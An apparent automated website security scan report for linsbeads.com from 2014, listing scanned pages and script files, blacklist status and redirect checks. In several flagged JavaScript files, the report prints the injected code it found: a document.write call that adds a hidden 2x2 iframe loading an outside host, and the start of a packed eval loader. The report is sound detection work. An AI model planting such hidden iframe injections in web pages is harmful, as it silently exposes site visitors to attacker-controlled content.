Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=linsbeads.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://linsbeads.com/ | HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 28 Aug 2014 07:28:20 GMT Pragma: no-cache Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 28 Aug 2014 07:28:21 GMT Set-Cookie: sess_id=5eYJVoj2tlVnjqoht09a52; expires=Thu, 11-Sep-2014 07:28:21 GMT; path=/; domain=.linsbeads.com | clean |
http://www.linsbeads.com/index.php | 200 OK Content-Length: 53246 Content-Type: text/html | clean |
http://www.linsbeads.com/lib/jquery/jquery.js | 200 OK Content-Length: 31204 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=989997></iframe>');
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b' Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://investice-do-nemovitosti.eu/cewf.html?j=989997 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=989997> | ||
http://linsbeads.com/js/core.js | 200 OK Content-Length: 75947 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=989997></iframe>');
jQuery.extend({ checkCookie: '', loadingBoxShow: '', lastClickedElement: '', area: '', get_window_sizes: function() { var iebody = (document.compatMode && document.compatMode != 'BackCompat') ? document.documentElement : document.body; params[i] = _data[1] + (parseInt(_data[2]) + 10); } } request_url += params.join('&'); $('a.cm-ajax-content', parent_content).attr('rev', request_url); var params = { result_ids: content_id + '_wrap_content', autoload: true, hidden: true, callback: fn_ajax_content_callback }; $.ajaxRequest(request_url, params); fn_ajax_content_autoload.allow_request = false; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://investice-do-nemovitosti.eu/cewf.html?j=989997 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=989997> | ||
http://linsbeads.com/js/ajax.js | 200 OK Content-Length: 12519 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=989997></iframe>');
jQuery.extend({ ajaxRequest: function(url, params) { params = params || {}; params.method = params.method || 'get'; params.callback = params.callback || {}; params.pre_processing = params.pre_processing || {}; params.data = params.data || {}; params.message = par var amp = ''; for (var i = 0; i < srch_array.length; i++) { temp_array = srch_array[i].split("="); concat = true; for (var j = 0; j < vars.length; j++) { if (vars[j] == temp_array[0] || temp_array[0].indexOf(vars[j]+'[') != -1) { concat = false; break; } } if (concat == true) { start += amp + temp_array[0] + '=' + temp_array[1] } amp = '&'; } } return start; }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://investice-do-nemovitosti.eu/cewf.html?j=989997 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=989997> | ||
http://linsbeads.com/addons/recurring_billing/js/func.js | 200 OK Content-Length: 1676 Content-Type: application/javascript | clean |
http://linsbeads.com/js/exceptions.js | 200 OK Content-Length: 3563 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=989997></iframe>');
function fn_change_options(obj_id, id, option_id) { cart_changed = true; params = []; update_ids = []; cache_query = true; if (jQuery.ua.browser == 'Internet Explorer') { cache_query = false; } parents = $('.cm-reload-' + obj_id); jQuery.e { var images = {}; images = $('[id*=variant_image_' + prefix + '_' + opt_id + ']'); images.removeClass('product-variant-image-selected').addClass('product-variant-image-unselected'); if (typeof(var_id) == 'undefined') { var_id = $('select[id*=_' + prefix + '_' + opt_id + ']').val(); } $('[id*=variant_image_' + prefix + '_' + opt_id + '_' + var_id + ']').removeClass('product-variant-image-unselected').addClass('product-variant-image-selected'); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://investice-do-nemovitosti.eu/cewf.html?j=989997 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=989997> | ||
http://linsbeads.com/addons/hot_deals_block/js/jquery.deals.js | 200 OK Content-Length: 8864 Content-Type: application/javascript | clean |
http://linsbeads.com/index.php | HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 28 Aug 2014 07:28:30 GMT Pragma: no-cache Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 28 Aug 2014 07:28:30 GMT Set-Cookie: sess_id=E1lT5eB3GJDYGczFnJtE03; expires=Thu, 11-Sep-2014 07:28:30 GMT; path=/; domain=.linsbeads.com | clean |
http://www.linsbeads.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://linsbeads.com/index.php?dispatch=pages.view&page_id=3 | HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 28 Aug 2014 07:28:31 GMT Pragma: no-cache Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 28 Aug 2014 07:28:32 GMT Set-Cookie: sess_id=P4RR8mBcr4Xygd2s1QVeh3; expires=Thu, 11-Sep-2014 07:28:32 GMT; path=/; domain=.linsbeads.com | clean |
http://www.linsbeads.com/index.php?dispatch=pages.view&page_id=3 | 200 OK Content-Length: 7508 Content-Type: text/html | clean |
http://www.linsbeads.com/js/core.js | 200 OK Content-Length: 75947 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=989997></iframe>');
jQuery.extend({ checkCookie: '', loadingBoxShow: '', lastClickedElement: '', area: '', get_window_sizes: function() { var iebody = (document.compatMode && document.compatMode != 'BackCompat') ? document.documentElement : document.body; params[i] = _data[1] + (parseInt(_data[2]) + 10); } } request_url += params.join('&'); $('a.cm-ajax-content', parent_content).attr('rev', request_url); var params = { result_ids: content_id + '_wrap_content', autoload: true, hidden: true, callback: fn_ajax_content_callback }; $.ajaxRequest(request_url, params); fn_ajax_content_autoload.allow_request = false; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://investice-do-nemovitosti.eu/cewf.html?j=989997 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=989997> | ||
http://linsbeads.com/index.php?dispatch=pages.view&page_id=1 | HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 28 Aug 2014 07:28:35 GMT Pragma: no-cache Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 28 Aug 2014 07:28:35 GMT Set-Cookie: sess_id=RY2zOz-5e-6-NaFGbtnvL3; expires=Thu, 11-Sep-2014 07:28:36 GMT; path=/; domain=.linsbeads.com | clean |
http://www.linsbeads.com/index.php?dispatch=pages.view&page_id=1 | 200 OK Content-Length: 7508 Content-Type: text/html | clean |
http://www.linsbeads.com/js/ajax.js | 200 OK Content-Length: 12519 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=989997></iframe>');
jQuery.extend({ ajaxRequest: function(url, params) { params = params || {}; params.method = params.method || 'get'; params.callback = params.callback || {}; params.pre_processing = params.pre_processing || {}; params.data = params.data || {}; params.message = par var amp = ''; for (var i = 0; i < srch_array.length; i++) { temp_array = srch_array[i].split("="); concat = true; for (var j = 0; j < vars.length; j++) { if (vars[j] == temp_array[0] || temp_array[0].indexOf(vars[j]+'[') != -1) { concat = false; break; } } if (concat == true) { start += amp + temp_array[0] + '=' + temp_array[1] } amp = '&'; } } return start; }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://investice-do-nemovitosti.eu/cewf.html?j=989997 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=989997> | ||
http://linsbeads.com/index.php?dispatch=gift_certificates.add | HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 28 Aug 2014 07:28:38 GMT Pragma: no-cache Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 28 Aug 2014 07:28:38 GMT Set-Cookie: sess_id=wTCNtyppsyP6dG37iVUAc2; expires=Thu, 11-Sep-2014 07:28:38 GMT; path=/; domain=.linsbeads.com | clean |
http://www.linsbeads.com/index.php?dispatch=gift_certificates.add | 200 OK Content-Length: 70043 Content-Type: text/html | clean |
http://www.linsbeads.com/addons/recurring_billing/js/func.js | 200 OK Content-Length: 1676 Content-Type: application/javascript | clean |
http://linsbeads.com/js/profiles_scripts.js | 200 OK Content-Length: 2033 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=989997></iframe>');
jQuery.profiles = { rebuild_states : function(section, elm) { var country_id = $('.cm-country.cm-location-' + section).attr('for'); elm = elm || $('#' + $('.cm-state.cm-location-' + section).attr('for')).attr('id'); var sbox = $('#' + elm).is('select') ? $('#' + elm) : $('#' + elm inp.attr('id', elm).attr('disabled', '').show().removeClass('cm-skip-avail-switch'); if (!sbox.hasClass('disabled')) { inp.removeClass('disabled'); } } if (cntr_disabled == true) { sbox.attr('disabled', 'disabled'); inp.attr('disabled', 'disabled'); } default_state[section] = (sbox.attr('disabled')) ? inp.val() : sbox.val(); } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://investice-do-nemovitosti.eu/cewf.html?j=989997 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=989997> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: linsbeads.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 28 Aug 2014 07:28:20 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 28 Aug 2014 07:28:21 GMT
Set-Cookie: sess_id=5eYJVoj2tlVnjqoht09a52; expires=Thu, 11-Sep-2014 07:28:21 GMT; path=/; domain=.linsbeads.com
GET / HTTP/1.1
Host: linsbeads.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 28 Aug 2014 07:28:20 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 28 Aug 2014 07:28:21 GMT
Set-Cookie: sess_id=5eYJVoj2tlVnjqoht09a52; expires=Thu, 11-Sep-2014 07:28:21 GMT; path=/; domain=.linsbeads.com
Second query (visit from search engine):
GET / HTTP/1.1
Host: linsbeads.com
Referer: http://www.google.com/search?q=linsbeads.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: linsbeads.com
Referer: http://www.google.com/search?q=linsbeads.com
Result:
The result is similar to the first query. There are no suspicious redirects found.